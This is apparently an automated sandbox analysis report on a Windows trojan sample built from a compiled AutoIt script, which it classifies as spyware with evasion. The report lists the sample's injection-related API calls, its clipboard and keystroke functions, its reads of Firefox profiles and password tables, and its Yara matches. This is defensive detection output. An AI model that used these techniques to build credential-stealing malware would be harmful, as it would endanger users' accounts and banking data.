                Source: control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: control.exe, 00000005.00000002.2620545178.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: control.exe, 00000005.00000003.2026768122.0000000007CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00404164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00404164
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00404164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00404164
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00403F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00403F66
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003F001C
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_0041CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0041CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.26a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.26a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: This is a third-party compiled AutoIt script.0_2_00393B3A
                Source: 5by4QM3v89.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 5by4QM3v89.exe, 00000000.00000000.1352911591.0000000000444000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_100f332e-c
                Source: 5by4QM3v89.exe, 00000000.00000000.1352911591.0000000000444000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_de006a3d-4
                Source: 5by4QM3v89.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_61efd524-a
                Source: 5by4QM3v89.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f69e6e19-3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026CC7F3 NtClose,2_2_026CC7F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B60 NtClose,LdrInitializeThunk,2_2_03172B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03172DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031735C0 NtCreateMutant,LdrInitializeThunk,2_2_031735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174340 NtSetContextThread,2_2_03174340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174650 NtSuspendThread,2_2_03174650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B80 NtQueryInformationFile,2_2_03172B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BA0 NtEnumerateValueKey,2_2_03172BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BF0 NtAllocateVirtualMemory,2_2_03172BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BE0 NtQueryValueKey,2_2_03172BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AB0 NtWaitForSingleObject,2_2_03172AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AD0 NtReadFile,2_2_03172AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AF0 NtWriteFile,2_2_03172AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F30 NtCreateSection,2_2_03172F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F60 NtCreateProcessEx,2_2_03172F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F90 NtProtectVirtualMemory,2_2_03172F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FB0 NtResumeThread,2_2_03172FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FA0 NtQuerySection,2_2_03172FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FE0 NtCreateFile,2_2_03172FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E30 NtWriteVirtualMemory,2_2_03172E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E80 NtReadVirtualMemory,2_2_03172E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EA0 NtAdjustPrivilegesToken,2_2_03172EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EE0 NtQueueApcThread,2_2_03172EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D10 NtMapViewOfSection,2_2_03172D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D00 NtSetInformationFile,2_2_03172D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D30 NtUnmapViewOfSection,2_2_03172D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DB0 NtEnumerateKey,2_2_03172DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DD0 NtDelayExecution,2_2_03172DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C00 NtQueryInformationProcess,2_2_03172C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C70 NtFreeVirtualMemory,2_2_03172C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C60 NtCreateKey,2_2_03172C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CA0 NtQueryInformationToken,2_2_03172CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CC0 NtQueryVirtualMemory,2_2_03172CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CF0 NtOpenProcess,2_2_03172CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173010 NtOpenDirectoryObject,2_2_03173010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173090 NtSetValueKey,2_2_03173090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031739B0 NtGetContextThread,2_2_031739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D10 NtOpenProcessToken,2_2_03173D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D70 NtOpenThread,2_2_03173D70
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_003FA1EF
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003E85B0 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_003E85B0
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003F51BD
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_0039E6A00_2_0039E6A0
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003BD9750_2_003BD975
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_0039FCE00_2_0039FCE0
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B21C50_2_003B21C5
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C62D20_2_003C62D2
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_004103DA0_2_004103DA
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C242E0_2_003C242E
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B25FA0_2_003B25FA
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003EE6160_2_003EE616
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003A66E10_2_003A66E1
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C878F0_2_003C878F
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_004108570_2_00410857
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003A88080_2_003A8808
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C68440_2_003C6844
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F88890_2_003F8889
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003BCB210_2_003BCB21
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C6DB60_2_003C6DB6
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003A6F9E0_2_003A6F9E
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003A30300_2_003A3030
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B31870_2_003B3187
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003BF1D90_2_003BF1D9
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003912870_2_00391287
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B14840_2_003B1484
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003A55200_2_003A5520
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B76960_2_003B7696
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003A57600_2_003A5760
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B19780_2_003B1978
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C9AB50_2_003C9AB5
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00417DDB0_2_00417DDB
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003BBDA60_2_003BBDA6
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B1D900_2_003B1D90
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_0039DF000_2_0039DF00
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003A3FE00_2_003A3FE0
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_013190900_2_01319090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026B86F32_2_026B86F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026AE2772_2_026AE277
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A32002_2_026A3200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026AE2832_2_026AE283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A23AC2_2_026A23AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A23B02_2_026A23B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026B68F32_2_026B68F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026B01432_2_026B0143
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026AE1292_2_026AE129
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026AE1332_2_026AE133
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A11002_2_026A1100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A27402_2_026A2740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026AFF232_2_026AFF23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A27312_2_026A2731
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A2CE02_2_026A2CE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026CEDF32_2_026CEDF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA3522_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032003E62_2_032003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F02_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E02742_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C02C02_2_031C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA1182_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031301002_2_03130100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C81582_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032001AA2_2_032001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F41A22_2_031F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F81CC2_2_031F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D20002_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031647502_2_03164750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031407702_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313C7C02_2_0313C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315C6E02_2_0315C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031405352_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032005912_2_03200591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E44202_2_031E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F24462_2_031F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EE4F62_2_031EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FAB402_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F6BD72_2_031F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA802_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031569622_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320A9A62_2_0320A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A02_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314A8402_2_0314A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031428402_2_03142840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031268B82_2_031268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E8F02_2_0316E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160F302_2_03160F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E2F302_2_031E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03182F282_2_03182F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4F402_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BEFA02_2_031BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132FC82_2_03132FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314CFE02_2_0314CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FEE262_2_031FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140E592_2_03140E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152E902_2_03152E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FCE932_2_031FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FEEDB2_2_031FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DCD1F2_2_031DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314AD002_2_0314AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03158DBF2_2_03158DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313ADE02_2_0313ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140C002_2_03140C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0CB52_2_031E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130CF22_2_03130CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F132D2_2_031F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D34C2_2_0312D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0318739A2_2_0318739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A02_2_031452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C02_2_0315B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED2_2_031E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320B16B2_2_0320B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F1722_2_0312F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317516C2_2_0317516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314B1B02_2_0314B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF0CC2_2_031EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C02_2_031470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F70E92_2_031F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF0E02_2_031FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF7B02_2_031FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031317EC2_2_031317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031856302_2_03185630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F16CC2_2_031F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F75712_2_031F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DD5B02_2_031DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032095C32_2_032095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF43F2_2_031FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031314602_2_03131460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFB762_2_031FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315FB802_2_0315FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B5BF02_2_031B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317DBF92_2_0317DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFA492_2_031FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F7A462_2_031F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B3A6C2_2_031B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DDAAC2_2_031DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03185AA02_2_03185AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E1AA32_2_031E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EDAC62_2_031EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D59102_2_031D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031499502_2_03149950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B9502_2_0315B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AD8002_2_031AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031438E02_2_031438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFF092_2_031FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141F922_2_03141F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFFB12_2_031FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03103FD22_2_03103FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03103FD52_2_03103FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03149EB02_2_03149EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F1D5A2_2_031F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03143D402_2_03143D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F7D732_2_031F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315FDC02_2_0315FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B9C322_2_031B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFCF22_2_031FFCF2
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: String function: 00397DE1 appears 35 times
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: String function: 003B0AE3 appears 70 times
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: String function: 003B8900 appears 42 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 283 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 109 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
                Source: 5by4QM3v89.exe, 00000000.00000003.1391586928.0000000003CE3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5by4QM3v89.exe
                Source: 5by4QM3v89.exe, 00000000.00000003.1391322495.0000000003E8D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5by4QM3v89.exe
                Source: 5by4QM3v89.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@5/5
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FA06A GetLastError,FormatMessageW,0_2_003FA06A
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003E81CB AdjustTokenPrivileges,CloseHandle,0_2_003E81CB
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003E87E1
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003FB333
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_0040EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0040EE0D
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_003FC397
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00394E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00394E89
                Source: C:\Users\user\Desktop\5by4QM3v89.exeFile created: C:\Users\user\AppData\Local\Temp\autB5BA.tmpJump to behavior
                Source: 5by4QM3v89.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: control.exe, 00000005.00000002.2620545178.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2620545178.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2620545178.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2620545178.0000000002CEC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2027754111.0000000002CE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
